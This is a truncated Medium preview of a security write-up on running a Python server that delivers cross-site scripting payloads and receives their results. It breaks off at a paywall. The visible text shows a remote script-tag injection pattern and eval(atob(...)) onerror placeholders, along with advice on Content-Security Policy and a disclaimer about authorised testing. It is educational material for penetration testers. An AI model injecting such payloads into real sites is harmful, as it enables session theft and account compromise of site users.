Open in app

Sign up

Sign in

Write

Sign up

Sign in

Home

Following

Library

Stories

Stats

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

Python Powered XSS Server

Pampuna
InfoSec Write-ups
Published in
6 min readFeb 26, 2025

So, are you ready to mess around with Cross-Site Scripting and Python?Before we start, let me first explain what I mean with a payload server. It serves two goals:

  • GET: Deliver script files containing XSS payloads.
  • POST: Receive results from executed payloads.

Not a member? Read this article for free on my site.

Just to clarify, I’m talking about remote XSS payloads, which can help bypass character limits and content filtering. This applies to both reflected and persisted XSS. For example:

<!-- So, this: -->
<script src="https://pampuna.nl/fake/xss.js"></script>
<!-- But not this: -->
<script>eval(atob('A_VERY_LARGE_BASE64_PAYLOAD'))</script>
<img src=1 onerror="eval(atob('A_VERY_LARGE_BASE64_PAYLOAD'))">
Payloads coming out of a computer (DALL·E 3)

Impact

The example payloads in this article are intended to highlight the potential severity and impact of XSS attacks. They demonstrate what a simplified version of an actual attack could look like and are included solely for educational and illustrative purposes. While many examples typically show a simple alert, JavaScript’s capabilities extend far beyond that, enabling attackers to inflict much greater damage.

Mitigating XSS

While you could probably write a book about ways to prevent scripts from being injected in the first place, the fastest way to overcome the bulk of XSS is by preventing execution entirely.

Unless you’re absolutely confident in your setup, make sure to tighten your Content-Security Policy (CSP). Review it carefully and apply it accordingly:
https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

Preparing some payloads

This article is written for educational purposes and is intended only for legal penetration testing and red teaming activities, where explicit permission has been granted. If you wish to test any of the scripts provided, please refer to the disclaimer at the end of this post.

Now that is out of the way, lets have some fun! In my working directory, I’ve created a Python server script and a payloads folder containing three example payloads:

./server.py…

Create an account to read the full story.

The author made this story available to Medium members only.
If you’re new to Medium, create a new account to read this story on us.

Continue in app
Or, continue in mobile web

Already have an account? Sign in

InfoSec Write-ups
InfoSec Write-ups
Follow

Published in InfoSec Write-ups

57K Followers
Last published 19 hours ago

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow
Pampuna
Pampuna
Follow

Written by Pampuna

27 Followers
6 Following

Ethical Hacker & Security Researcher. Crafting offensive tools with Python & PowerShell, emphasizing defensive strategies. Passionate about digital security.

Follow

No responses yet

Write a response

What are your thoughts?

More from Pampuna and InfoSec Write-ups

See all from Pampuna
See all from InfoSec Write-ups

Recommended from Medium

See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech